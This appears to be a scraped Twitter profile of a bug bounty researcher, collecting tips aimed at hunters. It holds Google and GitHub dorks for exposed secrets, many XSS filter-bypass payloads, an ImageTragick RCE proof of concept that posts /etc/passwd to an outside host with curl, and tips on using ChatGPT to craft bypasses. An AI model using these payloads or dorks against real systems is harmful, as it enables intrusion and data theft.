Mike Takahashi @TakSec Twitter profile

Pinned Tweet

Mike Takahashi

@TakSec

1 year

Google Dorks for Bug Bounty Input your target to generate Google Dork links for easy OSINT recon #bugbountytips

28

241

676

Last Seen Profiles

@goonerfembaby

@AngiFerreira97

@lanaevem

@shankarravifun

@JosBent42772035

@sbsalome2

@kurjasieppo

@HemantRawel

@sanjea

@j7534e3wHvz4iRI

@adonzzo

@gorgy2308

@MohiganFootball

@pow1_david

@_Eboi

@baepna

@AdheNona9

@GazeteOksijen

@LaxmanRam191631

@PassingDrill

@KaminskiPiotrM

@lospalitos_

@CoachWesCope

@GlitiP9

@HydeFanSite

@who_shiro_

@CdcPresidence

@JanisIkstens

@TheLoveSchoolTV

@rlatheka0

@TransPantyBulge

@janfrodeno

@TerryVandrovec

@SpainJadon

@cv_girlsbball

@howard__roark__

Mike Takahashi

@TakSec

11 months

32

739

3K

Mike Takahashi

@TakSec

1 year

Google Dorks - Cloud Storage: site: "target[.]com" site: "target[.]com" site: "target[.]com" site: "target[.]com" Find buckets and sensitive data #recon #bugbountytips #infosec #seo

81

779

3K

Mike Takahashi

@TakSec

2 months

Google Dork - API Endpoints ⚙️ site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3 Find juicy API Endpoints for further testing 🎯

13

356

3K

Mike Takahashi

@TakSec

1 year

Google Dorks - Part 4: site: "target[.]com" site: "target[.]com" site: "target[.]com" site: "target[.]com" Find hidden endpoints and sensitive data #recon #bugbountytips #infosec

69

636

3K

Mike Takahashi

@TakSec

2 months

9

302

3K

Mike Takahashi

@TakSec

11 months

Google Dork I use every time site:target[.]com ext:php

13

301

2K

Mike Takahashi

@TakSec

6 months

4

325

1K

Mike Takahashi

@TakSec

2 months

Google Dork - Login Pages 🔑 inurl:login | inurl:signin | intitle:login | intitle:signin | inurl:secure site:example[.]com Find hidden login pages and admin panels 👀

4

130

1K

Mike Takahashi

@TakSec

11 months

Google Dork - Sensitive Info inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:target[.]com Emails/phone #s /tokens commonly cached directly in Google

13

295

1K

Mike Takahashi

@TakSec

1 year

Google Dorks - File Storage: site: "example[.]com" site: "example[.]com" site: inurl:"/d/" "example[.]com" Find sensitive data and company accounts #recon #bugbountytips #infosec #seo

22

247

957

Mike Takahashi

@TakSec

1 year

ChatGPT for bug bounty: 1. Explain JS 2. JS -> Burp Repeater 3. CSRF PoC 4. XSS PoC A thread 🧵👇

29

157

787

Mike Takahashi

@TakSec

10 months

Google Dork - Deep Subdomains site:*.*.*.target[.]com

5

142

736

Mike Takahashi

@TakSec

1 year

My favorite Google dorks - Part 2: ext:php inurl:%3F site:*.*.*.<domain> filetype:txt Example: site:tesla .com ext:php #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips #recon

16

177

733

Mike Takahashi

@TakSec

11 months

15

153

724

Mike Takahashi

@TakSec

11 months

4

169

710

Mike Takahashi

@TakSec

1 year

My favorite Google dork flow: 1. Start w/ "site:<domain>" 2. Remove stuff "-www" 3. Keep reading and removing until you get to the fun stuff Example: site:tesla .com -www -shop -share -ir -mfa #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips #recon #bugbountytip

24

176

697

Mike Takahashi

@TakSec

1 year

Google Dork - Apache Server Status Exposed: site:*/server-status apache Find sensitive GET requests w/ CSRF tokens & API keys. #recon #bugbountytips #infosec #seo #bugbounty #hacking

17

209

692

Mike Takahashi

@TakSec

1 year

Email Subdomain Takeovers by @AdamJSturge A lot of bug hunters aren't checking for these. High Impact - read emails from their domain #bugbountytips #infosec #recon #hacking

12

243

682

Mike Takahashi

@TakSec

1 year

/ are going down starting Feb 1st. Build your own XSS Hunter server w/ this easy script and step-by-step instructions by @AdamJSturge #xss #bugbountytips #bugbounty #hacking #infosec

Easy XSSHunter Express Setup Script

With xsshunter.com shutting down setting up your own xsshunter will be more important. This script will make it a lot easier

infosecwriteups.com

18

240

667

Mike Takahashi

@TakSec

11 months

🪣 AWS S3 Bucket Leaks 🧪 Basic Test 💻 AWS CLI 🔎 Google Dork 🛠️ Tools A thread 🧵👇

12

173

640

Mike Takahashi

@TakSec

6 months

Google Dork - File Upload 📁 (site:example[.]com | site:example[.]org) & intext:"choose file”

6

118

630

Mike Takahashi

@TakSec

1 year

My favorite XSS payloads: '"><img/src/onerror=prompt()> java%26Tab%3bscript:ale%26Tab%3brt() <iframe src=javascript:alert()// <s<script>cript>alert()</s<script>cript> #xss #bypass #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips

27

165

629

Mike Takahashi

@TakSec

1 year

19

174

616

Mike Takahashi

@TakSec

5 years

XSS filter bypass using stripped </div> tags to obfuscate. Multiple P2 Stored XSS on a private bug bounty program. XSS Payload: <</div>script</div>>alert()<</div>/script</div>> #BugBountyTips #bugbounty #xss @brutelogic

5

248

607

Mike Takahashi

@TakSec

1 year

Google Dorks - Cloud Storage #2 : site: "example[.]com" site: "example[.]com" site: "example[.]com" Find sensitive data and company assets #recon #bugbountytips #infosec #seo

10

148

589

Mike Takahashi

@TakSec

1 year

Google Dorks - Part 5 Other search engines: Example: site:tesla[.]com -site:ir.tesla[.]com Find hidden endpoints not on Google #recon #bugbountytips #seo #infosec

13

124

575

Mike Takahashi

@TakSec

10 months

Google Dork - SSRF inurl:http | inurl:proxy= | inurl:html= | inurl:data= | inurl:resource= inurl:& site:target[.]com

5

160

568

Mike Takahashi

@TakSec

6 months

Google Dorks - Cloud Storage: site:s3.amazonaws[.]com "target[.]com" site:blob.core[.]windows[.]net "target[.]com" site:googleapis[.]com "target[.]com" site:drive[.]google[.]com "target[.]com" Find buckets and sensitive data

2

149

527

Mike Takahashi

@TakSec

4 years

XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()// #xss #bugbountytip #bugbountytips #bugbounty #hacking @brutelogic

7

227

512

Mike Takahashi

@TakSec

10 months

XSS-Bypass Anatomy Final payload after working hours on a bug bounty target w/ both XSS filters & WAF: %0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A

3

156

502

Mike Takahashi

@TakSec

11 months

Google Dork - Find Everything 1️⃣ site:target[.]com 2️⃣ Remove noise w/ negative search: -site:www[.]target[.]com -inurl:news -ir 3️⃣Keep going until you find everything

5

131

498

Mike Takahashi

@TakSec

6 months

3

125

493

Mike Takahashi

@TakSec

1 year

My favorite Google dorks - Part 3: OR - Include both queries & - Require both queries intext: - Appears in the page Example: (site:site:tesla. com | teslamotors. com) & intext:"choose file” #bugbountytips #bugbounty #hacking #infosec #recon #seo

11

124

494

Mike Takahashi

@TakSec

10 months

2

133

493

Mike Takahashi

@TakSec

1 year

Google Dork - Publicly Disclosed XSS: site: inurl:reports intext:"<target>.com" 1. Bypass previously “fixed” XSS 2. Escalate SSRF w/ unpatched open redirects #recon #xss #bugbountytips #bugbounty #hacking #infosec

15

134

477

Mike Takahashi

@TakSec

5 months

Google Dork - Bug Bounty Programs 💰 inurl:bounty "reward" "scope" "report" -yeswehack -hackerone -bugcrowd -synack -openbugbounty Find bug bounty programs others don't know about 🕵️‍♂️

0

95

478

Mike Takahashi

@TakSec

2 years

My favorite Burp extensions. Many P1s off the back of these. #bugbounty #bugbountytips #hacking #infosec #cybersecuritytips

7

116

471

Mike Takahashi

@TakSec

1 year

Tips for getting into bug bounty and web pentesting: 1. Don't worry about certs, just hack or build something 2. @PortSwigger Web Security Academy: 3. Hack on a VDP until you get your first vuln 4. Build a tool or web app #bugbountytips #infosec

10

93

455

Mike Takahashi

@TakSec

2 months

3

70

472

Mike Takahashi

@TakSec

1 year

XSS Bypass - slice + external script Payload: <svg onload=eval(location.hash.slice(1))> Put this at the end of the URL: #with (document)body.appendChild(createElement('script')).src='//domain' More from @brutelogic : #xss #bugbountytips #hacking #infosec

7

160

461

Mike Takahashi

@TakSec

10 months

XSS Bypass - Stripped Tags Look for anything being removed 🔍 <</div>script</div>>alert()<</div>/script</div>> ⏬ <script>alert()</script> Bypass <script> Blacklist 💥

3

114

456

Mike Takahashi

@TakSec

1 year

My favorite Recon tools 🔥 Findomain - subdomains httpx - port scan Subjack - subdomain takeovers Nuclei - vuln scan anew - only new stuff Slack webhook - notifications #bugbountytips #recon #bugbounty #infosec #cybersecuritytips #hacking

16

144

454

Mike Takahashi

@TakSec

1 year

XSS Testing Steps for <a> tags: 1️⃣ <a href= https://example[.]com> ✅ 2️⃣ <a href=aaa:bbb> ✅ 3️⃣ <a href=javascript:bbb> ❌ 4️⃣ <a href=jav%26%23x61%3bscript:alert()> 💥 HTML entity to bypass blacklisted protocols #bugbountytips

16

133

427

Mike Takahashi

@TakSec

11 months

Common XSS locations 📍 🔍 Search 👤 Username 🔗 Links ✏️ Text Editor A thread 🧵👇

10

103

419

Mike Takahashi

@TakSec

1 year

ChatGPT - XSS Lab: Having trouble learning some vulnerability class? Just have ChatGPT make you a lab! Details in thread 🧵👇

16

90

412

Mike Takahashi

@TakSec

1 year

11

121

402

Mike Takahashi

@TakSec

1 year

Google Dork - API Docs: inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com" Uncover hidden API endpoints 🔍 #recon #bugbountytips #infosec #seo

12

106

398

Mike Takahashi

@TakSec

10 months

XSS Bypass - javascript: URI If you can inject these tags: <a> <iframe> <object> <embed> But, "javascript:" & "data:" are blocked Try these obfuscation techniques: java%00script: java%0Ascript: java&tab;script: Example: <a href="java%0Ascript:al%0Aert()">click</a>

3

111

397

Mike Takahashi

@TakSec

2 months

3

88

398

Mike Takahashi

@TakSec

6 months

Google Dork - Error Pages intext:"error" | intext:"exception" | intext:"not found" | intext:"failed" site:example[.]com

1

81

385

Mike Takahashi

@TakSec

1 year

Prompt Injections Everywhere 🔥 🔍 Basic Prompt Injection 🔓 Prompt Leak 🎯 Prompt Injection XSS 💉 Prompt Injection SQLi A thread 🧵👇

9

114

378

Mike Takahashi

@TakSec

1 year

Upload Scanner Burp Extension RCE, XXE, XSS 1. Find upload http request 2. Send the request to Upload Scanner #bugbountytips #bugbounty #RCE #cybersecuritytips #infosec #hacking

5

87

366

Mike Takahashi

@TakSec

1 year

Google Dork - Find Bug Bounty programs: "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" -inurl:news -site:*.de Last two bits reduce noise, but you can remove them. #bugbountytips #bugbounty #infosec

11

123

365

Mike Takahashi

@TakSec

1 year

6

98

361

Mike Takahashi

@TakSec

1 year

12

114

358

Mike Takahashi

@TakSec

1 year

Easy CSRF I see all the time: 1. In Burp, change request method from POST -> GET 2. Remove CSRF token 3. If PoC works against another user, you have CSRF #bugbountytips #bugbounty #infosec #cybersecuritytips #csrf

11

95

364

Mike Takahashi

@TakSec

5 years

XSS filter bypass: <embed src="javascript%26%63%6f%6c%6f%6e%3balert()"> The url encoded portion is the html entity for colon: : #bugbountytips #bugbounty #XSS

4

132

357

Mike Takahashi

@TakSec

10 months

Google Dork - Bug Bounty Programs "reward" "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"

5

81

350

Mike Takahashi

@TakSec

1 year

Bypass XSS filters for rich text editors like TinyMCE A thread 🧵👇

24

89

346

Mike Takahashi

@TakSec

1 year

WPScan - Best Flags 🔥 wpscan --url https://example[.]com --api-token <api token> --plugins-detection mixed -e vp,vt,cb,dbe,u1-10 --force A thread 🧵👇

6

109

348

Mike Takahashi

@TakSec

8 months

XSS Fuzzing w/ ChatGPT Prompt #1 : explain this: javascript:alert() Prompt #2 : show me alternatives Customize Bypass: list 10 that don't use the word "alert" intact

4

70

345

Mike Takahashi

@TakSec

5 years

XSS on a login page while stuck in an input tag with <> filtered. Final Payload: " formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src="" Also gets around "javascript" and "alert" blacklist with html entity Tab obfuscation. #BugBountyTips #bugbounty #XSS

1

132

342

Mike Takahashi

@TakSec

1 year

15

91

340

Mike Takahashi

@TakSec

1 year

Weird IDOR I've never seen before: 1. User 1 updates at /api/account 2. User 2 registers at /api/register 3. Change userID for /api/register from User 2 -> User 1 🤯 IDOR succeeds - User 2 changes account details of User 1 via registration endpoint #bugbountytips #infosec

12

78

332

Mike Takahashi

@TakSec

1 year

SSRF via PDF Generators 🚀 based on the work of @NahamSec and @barbixxxa A thread 🧵👇

6

125

333

Mike Takahashi

@TakSec

11 months

Google Dork - XSS & Open Redirects Disclosed site:openbugbounty[.]org inurl:reports intext:"target[.]"

5

68

335

Mike Takahashi

@TakSec

5 years

Recon to RCE: Google "upload" site:”target" -> upload form -> ImageTragick MVG -> RCE PoC: push graphic-context viewbox 0 0 200 200 fill 'url( https://example.123 "|curl -d "@/etc/passwd" -X POST ")' pop graphic-context #BugBountyTips #bugbounty #RCE

2

152

324

Mike Takahashi

@TakSec

1 year

New blog post: Hack rich text editors for XSS This is the method I use anytime I see a rich text editor embedded in a bug bounty or pentesting target. #xss #bugbountytips #infosec #hacking

XSS Bypass for Rich Text Editors

Tips for bypassing XSS filters in rich text editors like TinyMCE

thegrayarea.tech

4

91

316

Mike Takahashi

@TakSec

11 months

3

92

311

Mike Takahashi

@TakSec

1 year

Google Dork - Bug Bounty Programs site:*/security.txt "bounty" Find lesser known targets #bugbountytips

7

73

309

Mike Takahashi

@TakSec

1 year

Blind IDOR 💥 1. Change userID 2. Get 200 status code, but no info leak 3. Check email, SMS, and export files 4. Email notification leaks PII Great write up by @vickieli7 : #idor #BAC #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips

2

68

307

Mike Takahashi

@TakSec

1 year

4

78

303

Mike Takahashi

@TakSec

6 months

2

76

304

Mike Takahashi

@TakSec

1 year

P1 IDORs & BAC w/ Auth Analyzer Burp Extension: 1. Copy/paste session cookies from different users 2. Start Analyzer 3. Do things in browser w/ user 1 4. Look at SAME responses for any requests that user 2 can do that should only be accessible for user 1 #bugbountytips #hacking

11

114

292

Mike Takahashi

@TakSec

1 year

Google Dorks - Wordpress, Drupal, Joomla inurl:/wp-admin/admin-ajax.php intext:"Powered by" & intext:Drupal & inurl:user site:*/joomla/login #recon #bugbountytips #infosec #seo

2

80

289

Mike Takahashi

@TakSec

1 year

New blog post: Tips for BAC and IDOR Vulnerabilities Step-by-step guide including multiple types of IDORs and automation #bugbountytips #bugbounty #BAC #IDOR #hacking #infosec

Tips for BAC and IDOR Vulnerabilities

Step-by-step guide for uncovering Broken Access Control and Indirect Object Reference vulnerabilities for bug bounty hunters and…

infosecwriteups.com

4

109

287

Mike Takahashi

@TakSec

5 months

Google Dork - Unlisted Bug Bounty Programs 🐛 "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" reward -site:hackerone[.]com Some programs don't want to be listed in the directory; you can only access them directly via their site.

3

68

280

Mike Takahashi

@TakSec

1 year

9

89

271

Mike Takahashi

@TakSec

1 month

Easy Bounty Explained in 🧵 🔍 Google Dork 👀 API endpoint 👾 XSS probe '">< ⚡ Page breaks 🛠️ XSS payload 🚫 Akamai block 🔧 Akamai WAF bypass by @BRuteLogic 💥 XSS alert

6

53

276

Mike Takahashi

@TakSec

1 year

XSS context to keep 👀 out for - Multiple reflections 2 reflections, 1 input: param = */alert()</script><script>/* 2 reflections, 2 inputs: p1 = <svg/1=' p2 = 'onload=alert()> Credit: @brutelogic More: #xss #bugbountytips #bugbounty #hacking #infosec

7

101

272

Mike Takahashi

@TakSec

1 year

Github Dorks 1. Slack web hook: " https://hooks.slack[.]com/services/" 2. Slack API token: xoxp OR xoxb 3. Telegram API token: "api_hash" "api_id" 4. shell scripts: language:shell #recon #bugbountytips #infosec

9

77

269

Mike Takahashi

@TakSec

1 year

Google Dorks - Sharepoint & uncommon S3 domains: site: "example[.]com" site: "example[.]com" site: "example[.]com" Discover elusive buckets & sensitive files #recon #bugbountytips #infosec #seo

3

64

267

Mike Takahashi

@TakSec

1 year

ChatGPT for Bug Bounty - XXE: 1. Basic XML 2. SVG 3. Excel A thread 🧵👇

9

71

262

Mike Takahashi

@TakSec

6 months

Google Dork - Test Environments inurl:demo | inurl:dev | inurl:staging | inurl:test | inurl:sandbox site:example[.]com

3

70

269

Mike Takahashi

@TakSec

10 months

Google Dork - All the TLDs site:target.*

7

45

259

Mike Takahashi

@TakSec

1 year

Google Dorks - OneDrive, Firebase, and JFrog Artifactory: site: "example[.]com" site: "example[.]com" site: "example[.]com" Find sensitive data and company accounts #recon #bugbountytips #infosec #seo

3

84

259

Mike Takahashi

@TakSec

1 year

GPT-4 XSS payload

8

27

241

Mike Takahashi

@TakSec

6 months

Google Dork - Old Sites site:example[.]com -inurl:https Unexpected results with this one

2

43

240

Mike Takahashi

@TakSec

1 year

Easy CSRF and POST XSS PoC: 1. "Generate CSRF PoC" in Burp 2. Copy HTML 3. Paste into Decoder 4. Encode as Base64 and copy output 5. Paste it to the end of this URI: data:text/html;base64,<Base64 here> 6. Open the link to activate CSRF #bugbountytips #csrf #xss #infosec

5

77

234

Mike Takahashi

@TakSec

1 year

MobSF - Mobile Security Framework 📱🔐 created by @ajinabraham All-in-one mobile pentesting: 🔍Static Analysis 🎯 Dynamic Analysis 🌐 REST API A thread 🧵👇

10

61

236

Mike Takahashi

@TakSec

1 year

iframe Injection 1. iframes allowed, but only whitelisted domain 2. Find "safe" external redirect or open redirect 3. Payload: <iframe width="560" height="315" src=" https://[whitelisted domain]/?redir= https://taksecPoC/iframexss.html"></iframe> #bugbountytips #hacking #infosec

3

58

233

Mike Takahashi

@TakSec

1 year

ChatGPT for Bug Bounty - Part 2: 1. Brainstorm 2. Pick BBP 3. Terms 4. Impact 5. Understand Disclosed Report A thread 🧵👇

10

47

223

Mike Takahashi

@TakSec

1 year

🚀 Ready to level up your Burp Suite game? Check out my latest Medium article packed with tips & tricks to supercharge your workflow! From filtering proxy history to must-have extensions, we've got you covered! 🌐🔥 Read & share: #bugbountytips

6 Burp Suite Tips & Tricks

Turbocharge your web application security testing, bug bounty hunting, and pentesting with these essential Burp Suite configuration hacks

infosecwriteups.com

2

75

218

Mike Takahashi

@TakSec

1 year

XSS via Angular Client-Side Template Injection P2/P3 >=1.6.0 {{constructor.constructor('alert(1)')()}} 1.2.24 - 1.2.29 {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\u002ex)alert(window\u002ex=1)')+eval(y)+\"'");}}}} #bugbountytips #xss #infosec

1

68

220

Mike Takahashi

@TakSec

10 months

Broken Access Control (BAC) - Basic Test 🧪 1️⃣ Log in to User A 👤🅰️ 2️⃣ Do something sensitive 🤫 3️⃣ Find HTTP request 🔍 4️⃣ Send to Burp Repeater ➡️ 5️⃣ Log in to User B 👤🅱️ 6️⃣ Use B's cookie to repeat A's request 🔄🍪 If it works, 💥 you've got a BAC vulnerability

7

58

215

Mike Takahashi

@TakSec

1 year

XSS in rails-html-sanitizer < 1.4.4 H1 reports by 0b5cur17y: Deep Dive by 0b5cur17y:

5

47

202

Mike Takahashi

@TakSec

1 year

20

63

204

Mike Takahashi

@TakSec

1 year

Github repo of all the Google Dorks I use:

GitHub - TakSec/google-dorks-bug-bounty: A list of Google Dorks for Bug Bounty, Web Application...

A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting - TakSec/google-dorks-bug-bounty

github.com

1

66

207

Mike Takahashi

@TakSec

1 year

New blog post: ChatGPT for Bug Bounty: Faster Hunting and Reporting Save time, learn technical skills, and write effective reports with AI-powered ChatGPT #bugbountytips #bugbounty #hacking #infosec #chatgpt #ai

ChatGPT for Bug Bounty: Faster Hunting and Reporting

Save Time, Learn Technical Skills, and Write Effective Reports with AI-Powered ChatGPT

infosecwriteups.com

8

53

204